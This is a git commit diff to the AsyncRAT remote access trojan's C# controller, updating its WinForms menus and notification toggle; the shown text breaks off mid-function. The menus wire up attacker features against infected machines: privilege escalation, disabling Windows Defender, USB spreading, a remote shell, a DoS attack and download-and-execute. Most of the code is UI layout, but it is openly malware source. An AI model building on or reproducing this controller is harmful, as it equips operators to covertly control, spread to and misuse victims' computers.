Update form1
This commit is contained in:
parent
0060b92651
commit
2edc7452c8
128
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
generated
128
AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs
generated
@ -55,10 +55,13 @@
|
|||||||
this.runToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
this.runToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.stopToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem();
|
this.stopToolStripMenuItem2 = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.miscellaneousToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
this.miscellaneousToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
|
this.getAdminPrivilegesToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.disableWindowsDefenderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
this.disableWindowsDefenderToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.botsKillerToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
this.botsKillerToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.uSBSpreadToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
this.uSBSpreadToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.getAdminPrivilegesToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
this.seedTorrentToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
|
this.remoteShellToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
|
this.dOSAttackToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.extraToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
this.extraToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.visitWebsiteToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
this.visitWebsiteToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
this.sendMessageBoxToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
this.sendMessageBoxToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
||||||
@ -108,12 +111,8 @@
|
|||||||
this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
|
this.performanceCounter1 = new System.Diagnostics.PerformanceCounter();
|
||||||
this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
|
this.performanceCounter2 = new System.Diagnostics.PerformanceCounter();
|
||||||
this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
|
this.notifyIcon1 = new System.Windows.Forms.NotifyIcon(this.components);
|
||||||
this.contextMenuNotification = new System.Windows.Forms.ContextMenuStrip(this.components);
|
|
||||||
this.notificationOFFToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
|
||||||
this.TimerTask = new System.Windows.Forms.Timer(this.components);
|
this.TimerTask = new System.Windows.Forms.Timer(this.components);
|
||||||
this.seedTorrentToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
this.toolStripStatusLabel2 = new System.Windows.Forms.ToolStripStatusLabel();
|
||||||
this.remoteShellToolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem();
|
|
||||||
this.dOSAttackToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
|
|
||||||
this.contextMenuClient.SuspendLayout();
|
this.contextMenuClient.SuspendLayout();
|
||||||
this.statusStrip1.SuspendLayout();
|
this.statusStrip1.SuspendLayout();
|
||||||
this.tabControl1.SuspendLayout();
|
this.tabControl1.SuspendLayout();
|
||||||
@ -126,7 +125,6 @@
|
|||||||
this.contextMenuTasks.SuspendLayout();
|
this.contextMenuTasks.SuspendLayout();
|
||||||
((System.ComponentModel.ISupportInitialize)(this.performanceCounter1)).BeginInit();
|
((System.ComponentModel.ISupportInitialize)(this.performanceCounter1)).BeginInit();
|
||||||
((System.ComponentModel.ISupportInitialize)(this.performanceCounter2)).BeginInit();
|
((System.ComponentModel.ISupportInitialize)(this.performanceCounter2)).BeginInit();
|
||||||
this.contextMenuNotification.SuspendLayout();
|
|
||||||
this.SuspendLayout();
|
this.SuspendLayout();
|
||||||
//
|
//
|
||||||
// listView1
|
// listView1
|
||||||
@ -211,20 +209,20 @@
|
|||||||
this.toolStripSeparator1,
|
this.toolStripSeparator1,
|
||||||
this.bUILDERToolStripMenuItem});
|
this.bUILDERToolStripMenuItem});
|
||||||
this.contextMenuClient.Name = "contextMenuStrip1";
|
this.contextMenuClient.Name = "contextMenuStrip1";
|
||||||
this.contextMenuClient.Size = new System.Drawing.Size(245, 273);
|
this.contextMenuClient.Size = new System.Drawing.Size(199, 240);
|
||||||
//
|
//
|
||||||
// aBOUTToolStripMenuItem
|
// aBOUTToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.aBOUTToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.info;
|
this.aBOUTToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.info;
|
||||||
this.aBOUTToolStripMenuItem.Name = "aBOUTToolStripMenuItem";
|
this.aBOUTToolStripMenuItem.Name = "aBOUTToolStripMenuItem";
|
||||||
this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(244, 32);
|
this.aBOUTToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.aBOUTToolStripMenuItem.Text = "ABOUT";
|
this.aBOUTToolStripMenuItem.Text = "ABOUT";
|
||||||
this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click);
|
this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click);
|
||||||
//
|
//
|
||||||
// toolStripSeparator2
|
// toolStripSeparator2
|
||||||
//
|
//
|
||||||
this.toolStripSeparator2.Name = "toolStripSeparator2";
|
this.toolStripSeparator2.Name = "toolStripSeparator2";
|
||||||
this.toolStripSeparator2.Size = new System.Drawing.Size(241, 6);
|
this.toolStripSeparator2.Size = new System.Drawing.Size(195, 6);
|
||||||
//
|
//
|
||||||
// sENDFILEToolStripMenuItem
|
// sENDFILEToolStripMenuItem
|
||||||
//
|
//
|
||||||
@ -233,7 +231,7 @@
|
|||||||
this.tODISKToolStripMenuItem});
|
this.tODISKToolStripMenuItem});
|
||||||
this.sENDFILEToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.tomem;
|
this.sENDFILEToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.tomem;
|
||||||
this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem";
|
this.sENDFILEToolStripMenuItem.Name = "sENDFILEToolStripMenuItem";
|
||||||
this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(244, 32);
|
this.sENDFILEToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.sENDFILEToolStripMenuItem.Text = "Send File";
|
this.sENDFILEToolStripMenuItem.Text = "Send File";
|
||||||
//
|
//
|
||||||
// tOMEMORYToolStripMenuItem
|
// tOMEMORYToolStripMenuItem
|
||||||
@ -261,7 +259,7 @@
|
|||||||
this.reportWindowToolStripMenuItem});
|
this.reportWindowToolStripMenuItem});
|
||||||
this.monitoringToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.monitoring_system;
|
this.monitoringToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.monitoring_system;
|
||||||
this.monitoringToolStripMenuItem.Name = "monitoringToolStripMenuItem";
|
this.monitoringToolStripMenuItem.Name = "monitoringToolStripMenuItem";
|
||||||
this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(244, 32);
|
this.monitoringToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.monitoringToolStripMenuItem.Text = "Monitoring";
|
this.monitoringToolStripMenuItem.Text = "Monitoring";
|
||||||
//
|
//
|
||||||
// remoteDesktopToolStripMenuItem1
|
// remoteDesktopToolStripMenuItem1
|
||||||
@ -340,9 +338,17 @@
|
|||||||
this.dOSAttackToolStripMenuItem});
|
this.dOSAttackToolStripMenuItem});
|
||||||
this.miscellaneousToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.Miscellaneous;
|
this.miscellaneousToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.Miscellaneous;
|
||||||
this.miscellaneousToolStripMenuItem.Name = "miscellaneousToolStripMenuItem";
|
this.miscellaneousToolStripMenuItem.Name = "miscellaneousToolStripMenuItem";
|
||||||
this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(244, 32);
|
this.miscellaneousToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.miscellaneousToolStripMenuItem.Text = "Miscellaneous";
|
this.miscellaneousToolStripMenuItem.Text = "Miscellaneous";
|
||||||
//
|
//
|
||||||
|
// getAdminPrivilegesToolStripMenuItem
|
||||||
|
//
|
||||||
|
this.getAdminPrivilegesToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
|
||||||
|
this.getAdminPrivilegesToolStripMenuItem.Name = "getAdminPrivilegesToolStripMenuItem";
|
||||||
|
this.getAdminPrivilegesToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
||||||
|
this.getAdminPrivilegesToolStripMenuItem.Text = "Get Admin Privileges";
|
||||||
|
this.getAdminPrivilegesToolStripMenuItem.Click += new System.EventHandler(this.GetAdminPrivilegesToolStripMenuItem_Click);
|
||||||
|
//
|
||||||
// disableWindowsDefenderToolStripMenuItem
|
// disableWindowsDefenderToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.disableWindowsDefenderToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled;
|
this.disableWindowsDefenderToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled;
|
||||||
@ -367,13 +373,29 @@
|
|||||||
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
|
this.uSBSpreadToolStripMenuItem1.Text = "USB Spread";
|
||||||
this.uSBSpreadToolStripMenuItem1.Click += new System.EventHandler(this.USBSpreadToolStripMenuItem1_Click);
|
this.uSBSpreadToolStripMenuItem1.Click += new System.EventHandler(this.USBSpreadToolStripMenuItem1_Click);
|
||||||
//
|
//
|
||||||
// getAdminPrivilegesToolStripMenuItem
|
// seedTorrentToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.getAdminPrivilegesToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
|
this.seedTorrentToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.u_torrent_logo;
|
||||||
this.getAdminPrivilegesToolStripMenuItem.Name = "getAdminPrivilegesToolStripMenuItem";
|
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
|
||||||
this.getAdminPrivilegesToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
||||||
this.getAdminPrivilegesToolStripMenuItem.Text = "Get Admin Privileges";
|
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
|
||||||
this.getAdminPrivilegesToolStripMenuItem.Click += new System.EventHandler(this.GetAdminPrivilegesToolStripMenuItem_Click);
|
this.seedTorrentToolStripMenuItem1.Click += new System.EventHandler(this.SeedTorrentToolStripMenuItem1_Click_1);
|
||||||
|
//
|
||||||
|
// remoteShellToolStripMenuItem1
|
||||||
|
//
|
||||||
|
this.remoteShellToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.shell;
|
||||||
|
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
|
||||||
|
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
||||||
|
this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
|
||||||
|
this.remoteShellToolStripMenuItem1.Click += new System.EventHandler(this.RemoteShellToolStripMenuItem1_Click_1);
|
||||||
|
//
|
||||||
|
// dOSAttackToolStripMenuItem
|
||||||
|
//
|
||||||
|
this.dOSAttackToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos;
|
||||||
|
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
|
||||||
|
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
||||||
|
this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
|
||||||
|
this.dOSAttackToolStripMenuItem.Click += new System.EventHandler(this.DOSAttackToolStripMenuItem_Click_1);
|
||||||
//
|
//
|
||||||
// extraToolStripMenuItem
|
// extraToolStripMenuItem
|
||||||
//
|
//
|
||||||
@ -383,14 +405,14 @@
|
|||||||
this.chatToolStripMenuItem1});
|
this.chatToolStripMenuItem1});
|
||||||
this.extraToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.extra;
|
this.extraToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.extra;
|
||||||
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
|
this.extraToolStripMenuItem.Name = "extraToolStripMenuItem";
|
||||||
this.extraToolStripMenuItem.Size = new System.Drawing.Size(244, 32);
|
this.extraToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.extraToolStripMenuItem.Text = "Extra";
|
this.extraToolStripMenuItem.Text = "Extra";
|
||||||
//
|
//
|
||||||
// visitWebsiteToolStripMenuItem1
|
// visitWebsiteToolStripMenuItem1
|
||||||
//
|
//
|
||||||
this.visitWebsiteToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.visit;
|
this.visitWebsiteToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.visit;
|
||||||
this.visitWebsiteToolStripMenuItem1.Name = "visitWebsiteToolStripMenuItem1";
|
this.visitWebsiteToolStripMenuItem1.Name = "visitWebsiteToolStripMenuItem1";
|
||||||
this.visitWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.visitWebsiteToolStripMenuItem1.Size = new System.Drawing.Size(258, 34);
|
||||||
this.visitWebsiteToolStripMenuItem1.Text = "Visit Website";
|
this.visitWebsiteToolStripMenuItem1.Text = "Visit Website";
|
||||||
this.visitWebsiteToolStripMenuItem1.Click += new System.EventHandler(this.VisitWebsiteToolStripMenuItem1_Click);
|
this.visitWebsiteToolStripMenuItem1.Click += new System.EventHandler(this.VisitWebsiteToolStripMenuItem1_Click);
|
||||||
//
|
//
|
||||||
@ -398,7 +420,7 @@
|
|||||||
//
|
//
|
||||||
this.sendMessageBoxToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.msgbox;
|
this.sendMessageBoxToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.msgbox;
|
||||||
this.sendMessageBoxToolStripMenuItem1.Name = "sendMessageBoxToolStripMenuItem1";
|
this.sendMessageBoxToolStripMenuItem1.Name = "sendMessageBoxToolStripMenuItem1";
|
||||||
this.sendMessageBoxToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.sendMessageBoxToolStripMenuItem1.Size = new System.Drawing.Size(258, 34);
|
||||||
this.sendMessageBoxToolStripMenuItem1.Text = "Send MessageBox";
|
this.sendMessageBoxToolStripMenuItem1.Text = "Send MessageBox";
|
||||||
this.sendMessageBoxToolStripMenuItem1.Click += new System.EventHandler(this.SendMessageBoxToolStripMenuItem1_Click);
|
this.sendMessageBoxToolStripMenuItem1.Click += new System.EventHandler(this.SendMessageBoxToolStripMenuItem1_Click);
|
||||||
//
|
//
|
||||||
@ -406,7 +428,7 @@
|
|||||||
//
|
//
|
||||||
this.chatToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.chat;
|
this.chatToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.chat;
|
||||||
this.chatToolStripMenuItem1.Name = "chatToolStripMenuItem1";
|
this.chatToolStripMenuItem1.Name = "chatToolStripMenuItem1";
|
||||||
this.chatToolStripMenuItem1.Size = new System.Drawing.Size(270, 34);
|
this.chatToolStripMenuItem1.Size = new System.Drawing.Size(258, 34);
|
||||||
this.chatToolStripMenuItem1.Text = "Chat";
|
this.chatToolStripMenuItem1.Text = "Chat";
|
||||||
this.chatToolStripMenuItem1.Click += new System.EventHandler(this.ChatToolStripMenuItem1_Click);
|
this.chatToolStripMenuItem1.Click += new System.EventHandler(this.ChatToolStripMenuItem1_Click);
|
||||||
//
|
//
|
||||||
@ -417,7 +439,7 @@
|
|||||||
this.pCToolStripMenuItem});
|
this.pCToolStripMenuItem});
|
||||||
this.systemToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.system;
|
this.systemToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.system;
|
||||||
this.systemToolStripMenuItem.Name = "systemToolStripMenuItem";
|
this.systemToolStripMenuItem.Name = "systemToolStripMenuItem";
|
||||||
this.systemToolStripMenuItem.Size = new System.Drawing.Size(244, 32);
|
this.systemToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.systemToolStripMenuItem.Text = "System";
|
this.systemToolStripMenuItem.Text = "System";
|
||||||
//
|
//
|
||||||
// clientToolStripMenuItem
|
// clientToolStripMenuItem
|
||||||
@ -431,7 +453,7 @@
|
|||||||
this.showFolderToolStripMenuItem});
|
this.showFolderToolStripMenuItem});
|
||||||
this.clientToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.client;
|
this.clientToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.client;
|
||||||
this.clientToolStripMenuItem.Name = "clientToolStripMenuItem";
|
this.clientToolStripMenuItem.Name = "clientToolStripMenuItem";
|
||||||
this.clientToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
|
this.clientToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
|
||||||
this.clientToolStripMenuItem.Text = "Client";
|
this.clientToolStripMenuItem.Text = "Client";
|
||||||
//
|
//
|
||||||
// restartToolStripMenuItem2
|
// restartToolStripMenuItem2
|
||||||
@ -482,7 +504,7 @@
|
|||||||
this.shutdownToolStripMenuItem1});
|
this.shutdownToolStripMenuItem1});
|
||||||
this.pCToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.pc;
|
this.pCToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.pc;
|
||||||
this.pCToolStripMenuItem.Name = "pCToolStripMenuItem";
|
this.pCToolStripMenuItem.Name = "pCToolStripMenuItem";
|
||||||
this.pCToolStripMenuItem.Size = new System.Drawing.Size(270, 34);
|
this.pCToolStripMenuItem.Size = new System.Drawing.Size(158, 34);
|
||||||
this.pCToolStripMenuItem.Text = "PC";
|
this.pCToolStripMenuItem.Text = "PC";
|
||||||
//
|
//
|
||||||
// logoffToolStripMenuItem1
|
// logoffToolStripMenuItem1
|
||||||
@ -509,13 +531,13 @@
|
|||||||
// toolStripSeparator1
|
// toolStripSeparator1
|
||||||
//
|
//
|
||||||
this.toolStripSeparator1.Name = "toolStripSeparator1";
|
this.toolStripSeparator1.Name = "toolStripSeparator1";
|
||||||
this.toolStripSeparator1.Size = new System.Drawing.Size(241, 6);
|
this.toolStripSeparator1.Size = new System.Drawing.Size(195, 6);
|
||||||
//
|
//
|
||||||
// bUILDERToolStripMenuItem
|
// bUILDERToolStripMenuItem
|
||||||
//
|
//
|
||||||
this.bUILDERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.builder;
|
this.bUILDERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.builder;
|
||||||
this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem";
|
this.bUILDERToolStripMenuItem.Name = "bUILDERToolStripMenuItem";
|
||||||
this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(244, 32);
|
this.bUILDERToolStripMenuItem.Size = new System.Drawing.Size(198, 32);
|
||||||
this.bUILDERToolStripMenuItem.Text = "BUILDER";
|
this.bUILDERToolStripMenuItem.Text = "BUILDER";
|
||||||
this.bUILDERToolStripMenuItem.Click += new System.EventHandler(this.bUILDERToolStripMenuItem_Click);
|
this.bUILDERToolStripMenuItem.Click += new System.EventHandler(this.bUILDERToolStripMenuItem_Click);
|
||||||
//
|
//
|
||||||
@ -523,7 +545,8 @@
|
|||||||
//
|
//
|
||||||
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
|
this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24);
|
||||||
this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
this.statusStrip1.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
||||||
this.toolStripStatusLabel1});
|
this.toolStripStatusLabel1,
|
||||||
|
this.toolStripStatusLabel2});
|
||||||
this.statusStrip1.Location = new System.Drawing.Point(0, 433);
|
this.statusStrip1.Location = new System.Drawing.Point(0, 433);
|
||||||
this.statusStrip1.Name = "statusStrip1";
|
this.statusStrip1.Name = "statusStrip1";
|
||||||
this.statusStrip1.Size = new System.Drawing.Size(1168, 32);
|
this.statusStrip1.Size = new System.Drawing.Size(1168, 32);
|
||||||
@ -778,55 +801,22 @@
|
|||||||
//
|
//
|
||||||
// notifyIcon1
|
// notifyIcon1
|
||||||
//
|
//
|
||||||
this.notifyIcon1.ContextMenuStrip = this.contextMenuNotification;
|
|
||||||
this.notifyIcon1.Icon = ((System.Drawing.Icon)(resources.GetObject("notifyIcon1.Icon")));
|
this.notifyIcon1.Icon = ((System.Drawing.Icon)(resources.GetObject("notifyIcon1.Icon")));
|
||||||
this.notifyIcon1.Text = "AsyncRAT";
|
this.notifyIcon1.Text = "AsyncRAT";
|
||||||
this.notifyIcon1.Visible = true;
|
this.notifyIcon1.Visible = true;
|
||||||
//
|
//
|
||||||
// contextMenuNotification
|
|
||||||
//
|
|
||||||
this.contextMenuNotification.ImageScalingSize = new System.Drawing.Size(20, 20);
|
|
||||||
this.contextMenuNotification.Items.AddRange(new System.Windows.Forms.ToolStripItem[] {
|
|
||||||
this.notificationOFFToolStripMenuItem});
|
|
||||||
this.contextMenuNotification.Name = "contextMenuStrip3";
|
|
||||||
this.contextMenuNotification.Size = new System.Drawing.Size(258, 36);
|
|
||||||
//
|
|
||||||
// notificationOFFToolStripMenuItem
|
|
||||||
//
|
|
||||||
this.notificationOFFToolStripMenuItem.Name = "notificationOFFToolStripMenuItem";
|
|
||||||
this.notificationOFFToolStripMenuItem.Size = new System.Drawing.Size(257, 32);
|
|
||||||
this.notificationOFFToolStripMenuItem.Text = "Notification [ON/OFF]";
|
|
||||||
this.notificationOFFToolStripMenuItem.Click += new System.EventHandler(this.NotificationOFFToolStripMenuItem_Click);
|
|
||||||
//
|
|
||||||
// TimerTask
|
// TimerTask
|
||||||
//
|
//
|
||||||
this.TimerTask.Enabled = true;
|
this.TimerTask.Enabled = true;
|
||||||
this.TimerTask.Interval = 5000;
|
this.TimerTask.Interval = 5000;
|
||||||
this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
|
this.TimerTask.Tick += new System.EventHandler(this.TimerTask_Tick);
|
||||||
//
|
//
|
||||||
// seedTorrentToolStripMenuItem1
|
// toolStripStatusLabel2
|
||||||
//
|
//
|
||||||
this.seedTorrentToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.u_torrent_logo;
|
this.toolStripStatusLabel2.Name = "toolStripStatusLabel2";
|
||||||
this.seedTorrentToolStripMenuItem1.Name = "seedTorrentToolStripMenuItem1";
|
this.toolStripStatusLabel2.Size = new System.Drawing.Size(204, 25);
|
||||||
this.seedTorrentToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
this.toolStripStatusLabel2.Text = " Notification";
|
||||||
this.seedTorrentToolStripMenuItem1.Text = "Seed Torrent";
|
this.toolStripStatusLabel2.Click += new System.EventHandler(this.ToolStripStatusLabel2_Click);
|
||||||
this.seedTorrentToolStripMenuItem1.Click += new System.EventHandler(this.SeedTorrentToolStripMenuItem1_Click_1);
|
|
||||||
//
|
|
||||||
// remoteShellToolStripMenuItem1
|
|
||||||
//
|
|
||||||
this.remoteShellToolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.shell;
|
|
||||||
this.remoteShellToolStripMenuItem1.Name = "remoteShellToolStripMenuItem1";
|
|
||||||
this.remoteShellToolStripMenuItem1.Size = new System.Drawing.Size(329, 34);
|
|
||||||
this.remoteShellToolStripMenuItem1.Text = "Remote Shell";
|
|
||||||
this.remoteShellToolStripMenuItem1.Click += new System.EventHandler(this.RemoteShellToolStripMenuItem1_Click_1);
|
|
||||||
//
|
|
||||||
// dOSAttackToolStripMenuItem
|
|
||||||
//
|
|
||||||
this.dOSAttackToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos;
|
|
||||||
this.dOSAttackToolStripMenuItem.Name = "dOSAttackToolStripMenuItem";
|
|
||||||
this.dOSAttackToolStripMenuItem.Size = new System.Drawing.Size(329, 34);
|
|
||||||
this.dOSAttackToolStripMenuItem.Text = "DOS Attack";
|
|
||||||
this.dOSAttackToolStripMenuItem.Click += new System.EventHandler(this.DOSAttackToolStripMenuItem_Click_1);
|
|
||||||
//
|
//
|
||||||
// Form1
|
// Form1
|
||||||
//
|
//
|
||||||
@ -855,7 +845,6 @@
|
|||||||
this.contextMenuTasks.ResumeLayout(false);
|
this.contextMenuTasks.ResumeLayout(false);
|
||||||
((System.ComponentModel.ISupportInitialize)(this.performanceCounter1)).EndInit();
|
((System.ComponentModel.ISupportInitialize)(this.performanceCounter1)).EndInit();
|
||||||
((System.ComponentModel.ISupportInitialize)(this.performanceCounter2)).EndInit();
|
((System.ComponentModel.ISupportInitialize)(this.performanceCounter2)).EndInit();
|
||||||
this.contextMenuNotification.ResumeLayout(false);
|
|
||||||
this.ResumeLayout(false);
|
this.ResumeLayout(false);
|
||||||
this.PerformLayout();
|
this.PerformLayout();
|
||||||
|
|
||||||
@ -895,8 +884,6 @@
|
|||||||
public System.Windows.Forms.ImageList ThumbnailImageList;
|
public System.Windows.Forms.ImageList ThumbnailImageList;
|
||||||
public System.Windows.Forms.ListView listView3;
|
public System.Windows.Forms.ListView listView3;
|
||||||
public System.Windows.Forms.NotifyIcon notifyIcon1;
|
public System.Windows.Forms.NotifyIcon notifyIcon1;
|
||||||
private System.Windows.Forms.ContextMenuStrip contextMenuNotification;
|
|
||||||
private System.Windows.Forms.ToolStripMenuItem notificationOFFToolStripMenuItem;
|
|
||||||
private System.Windows.Forms.ColumnHeader lv_admin;
|
private System.Windows.Forms.ColumnHeader lv_admin;
|
||||||
private System.Windows.Forms.TabPage tabPage4;
|
private System.Windows.Forms.TabPage tabPage4;
|
||||||
private System.Windows.Forms.ColumnHeader columnHeader4;
|
private System.Windows.Forms.ColumnHeader columnHeader4;
|
||||||
@ -947,6 +934,7 @@
|
|||||||
private System.Windows.Forms.ToolStripMenuItem seedTorrentToolStripMenuItem1;
|
private System.Windows.Forms.ToolStripMenuItem seedTorrentToolStripMenuItem1;
|
||||||
private System.Windows.Forms.ToolStripMenuItem remoteShellToolStripMenuItem1;
|
private System.Windows.Forms.ToolStripMenuItem remoteShellToolStripMenuItem1;
|
||||||
private System.Windows.Forms.ToolStripMenuItem dOSAttackToolStripMenuItem;
|
private System.Windows.Forms.ToolStripMenuItem dOSAttackToolStripMenuItem;
|
||||||
|
private System.Windows.Forms.ToolStripStatusLabel toolStripStatusLabel2;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -95,6 +95,15 @@ namespace AsyncRAT_Sharp
|
|||||||
trans = true;
|
trans = true;
|
||||||
|
|
||||||
await Task.Run(() => Connect());
|
await Task.Run(() => Connect());
|
||||||
|
|
||||||
|
if (Properties.Settings.Default.Notification == true)
|
||||||
|
{
|
||||||
|
toolStripStatusLabel2.ForeColor = Color.Green;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
toolStripStatusLabel2.ForeColor = Color.Black;
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
private void Connect()
|
private void Connect()
|
||||||
@ -242,19 +251,6 @@ namespace AsyncRAT_Sharp
|
|||||||
catch { }
|
catch { }
|
||||||
}
|
}
|
||||||
|
|
||||||
private void NotificationOFFToolStripMenuItem_Click(object sender, EventArgs e)
|
|
||||||
{
|
|
||||||
if (Properties.Settings.Default.Notification == true)
|
|
||||||
{
|
|
||||||
Properties.Settings.Default.Notification = false;
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
Properties.Settings.Default.Notification = true;
|
|
||||||
}
|
|
||||||
Properties.Settings.Default.Save();
|
|
||||||
}
|
|
||||||
|
|
||||||
private async void DownloadAndExecuteToolStripMenuItem_Click(object sender, EventArgs e)
|
private async void DownloadAndExecuteToolStripMenuItem_Click(object sender, EventArgs e)
|
||||||
{
|
{
|
||||||
try
|
try
|
||||||
@ -1109,5 +1105,20 @@ namespace AsyncRAT_Sharp
|
|||||||
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
private void ToolStripStatusLabel2_Click(object sender, EventArgs e)
|
||||||
|
{
|
||||||
|
if (Properties.Settings.Default.Notification == true)
|
||||||
|
{
|
||||||
|
Properties.Settings.Default.Notification = false;
|
||||||
|
toolStripStatusLabel2.ForeColor = Color.Black;
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
